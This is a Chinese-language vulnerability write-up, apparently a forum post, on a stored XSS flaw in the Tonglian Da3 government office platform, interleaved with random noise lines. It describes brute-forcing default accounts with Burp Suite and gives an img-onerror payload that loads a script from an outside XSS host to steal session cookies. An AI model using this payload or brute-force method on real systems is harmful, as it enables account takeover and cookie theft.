* h3 s' X5 [9 d# H ' w- V! k( P% h" g* { j' ^: O
同联Da3协同办公平台后台通用储存型xss漏洞
" d* U# ?9 L9 g5 W9 H7 C
" O0 a9 L: ~: C, H$ v3 b
6 N$ \( Z3 N7 [- c, _; h' d8 z% x 平台简介:
& i/ U5 B- Y8 h6 Q
7 m0 P/ M" E' l
. S- I; r& M. ^; z% `+ B! a % [" j x: K5 G
' S" I/ q5 ^9 b$ [6 U " \' |- |- n9 R0 v( V/ ~- w
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 h$ H4 J+ L$ D4 [
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 g( s, I, U# ^" W8 q
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 e% h9 w9 \5 i& G; g
2 H/ o! d( y9 H5 \) e& w: ?" h9 h( ~
9 S) ]; V1 | g; X
3 _% u; ~9 i' ?6 Y* B6 K- b! n& x
9 d6 D) A* ?; `$ S# Y0 ?
# w7 x1 @$ q# g; E; G( b0 t
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:$ k% H' w) z* P1 e) b8 \
- K8 A0 w9 ]" D" ^1 w
% P+ O. A a$ l6 }' }% M
' x7 @: K8 p# c0 Y
# {7 {+ a& Q2 X7 p: \8 J* [
( S& W- K: V4 w% E http://1.1.1.1:7197/cap-aco/#(案例2-)+ m% z# b7 q5 O& r9 s5 H3 K* S
% C) @+ S5 S( X7 j7 [
' G$ L0 l7 ?% b4 F+ I" B5 Q http://www.XXOO.com (案例1-官网网站)/ y ]6 A3 u6 s4 i6 Z2 M& G4 T, a
7 ~$ ~# Z% v) b" x2 B. ?* Z
3 x" o; U+ F6 c( q6 B$ U2 f1 Z! p7 B 漏洞详情:, K; R' J/ x/ t
& ]; O( O- k, N4 w2 ]! o$ j * W2 `( [/ R. r+ |: a4 G$ [+ i# q
案例一、& L3 I7 T- |" l9 G
. _2 N# g( f* H/ E4 X7 s% S' z
* {# A" \6 R. |3 I5 w9 S 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
/ c( O7 Y1 L" t% A# F! h7 z' p
3 p8 O) o3 A4 f) j$ X
. h! [, _$ g8 b& @ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:) Q3 ^- q# z0 D% f
! V- J% o) Q: U( k! P 2 o4 v: E5 s" Z: ?
) z0 r) v/ Z, \8 e4 G. b
5 e$ Z) y/ ^3 P$ M. ~/ G2 ]
$ a% }& ]* K; u; c4 v+ h $ J, i$ l8 k+ G4 Y$ E1 l
5 N, J# ^3 w, s/ w9 v
) @$ K- ~" R M- y" f status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: m& o- ]/ P& @- f# U
/ i% c: H& B, y
0 k% G! L" I, C
' U5 y d2 f+ D! a
+ J3 s* L# K4 Y" Z5 `+ Q
- [- ~. O- a1 ?% r% L5 m
, z7 d( I+ Z1 r" M. w/ g3 [# E" K; g) `
1 c" X1 X; {- [; w0 ?; j1 q5 ]1 H
/ {- `4 B! U6 e$ G3 x% H- W
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 B7 O5 v ?+ s. d8 _- r3 x! d
* z8 S# M+ ]3 H" o8 \7 V: r _ , {- o. U6 C8 ^. Y0 F9 T
' u( Z; K! r" G8 p. R
/ N9 Z+ I9 [( s1 A H. W' c
4 Y7 f- \3 X* S2 j/ W* ~# j
<img src=x! T5 e# j% ~% r3 @ X0 z! h1 |3 E# A
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
) O6 g% z3 d- ^& x A
l! w9 J1 x2 ?6 r
) r o1 O6 }3 c. P ; K( L# {6 T& q" x: X: Q, a
8 R3 T4 B0 W2 j8 ~
0 z5 \ `/ Y; l 然后发送,接收cookie如图: + N& d. c) }/ k2 @4 d5 P. d2 o
, `9 h8 R4 `/ ~: E
3 O. u! B5 W8 w7 G5 _
h! U8 p/ f8 H1 t. m0 |% U, \
" X5 U4 I. k1 }. M2 c' B. W% H9 l
. j6 S! U( q; L8 Q! m# }; u8 [8 R
! U1 j4 B: y4 A3 `2 ]6 C$ D+ Y
/ D- [- R' [+ i" Y. W; ?$ ^5 I # v3 H) F8 A( G0 N
7 ~6 g- c) F- Q/ b
~5 h' o+ ]: U 9 n; @4 U/ q' {8 N7 e7 e1 D
7 U& [( K! v2 |7 ~+ O, W: O
' P. H) _- S! _) W, S
2 g& z0 D2 U* Y6 z
7 Q1 s0 Y* |0 z, ~% x6 R
K1 _6 ^" L6 h9 a3 e
9 l) h1 i, |6 ?1 O % h t+ w) e0 O: S1 ^) t
9 k+ O) z, y4 Z9 ]0 U
1 ^" V) o# J/ y. \" z% x
! r& X( V! v* {2 H- o% A2 L
! X9 W8 `- K7 S2 F3 z* t* j - b# f* Z, V: H' Q* ~( W
案例2、
! S1 b/ ?+ H" c% N
% g5 r& {5 a6 q' L: Q, |
5 M) h. I/ X$ s 前面步骤都一样,下面看效果图: : g0 n* G+ j, M7 c! D: r. \4 N
* `! p& p6 w3 K" V4 S9 @7 | y
y/ O( Z: X. A1 R, ?8 ~2 C+ N0 e
[* Z% z7 ~' I
8 x$ R+ W# @* H3 E % [9 R. N# x, ]5 f# F
! T3 F2 M9 [; w
7 F. K) n/ n# O
& P& I: A+ G% F: n
5 S8 h0 K. V% s D/ d2 ?- D
) a( ]" ~) T: S
) r/ ~/ y. I" l" d- B: w8 U$ p: |- @ , ?) l0 W& U% ^7 Y4 F F* t
" J1 N M1 Y. A4 v; [! c- ?5 v
7 P. c S, a) o) _: t 7 v3 |) Q# p. a6 _% `7 G
; Y- D' t! y7 y+ N- |( S7 l+ ]8 L
0 i$ q @6 @# s1 H
) Z4 i3 F( g& o: a
" |. L5 ~1 h' X$ X Q' F7 b
) i2 u* J1 N, X5 \2 v 0 I1 ?5 P8 ^. f( }8 @
. E) b) R8 T3 z& w% [' W. X
" ~7 p& J6 ]- q( a, q0 n# f T# d 2 k: X6 h% G( J5 U% t
G& y7 m# ]& g- B0 ]: \
4 O/ E1 `- I+ k" a: t
/ Q; q; K& A H, ~4 a
2 l( [! {9 E7 B" z: z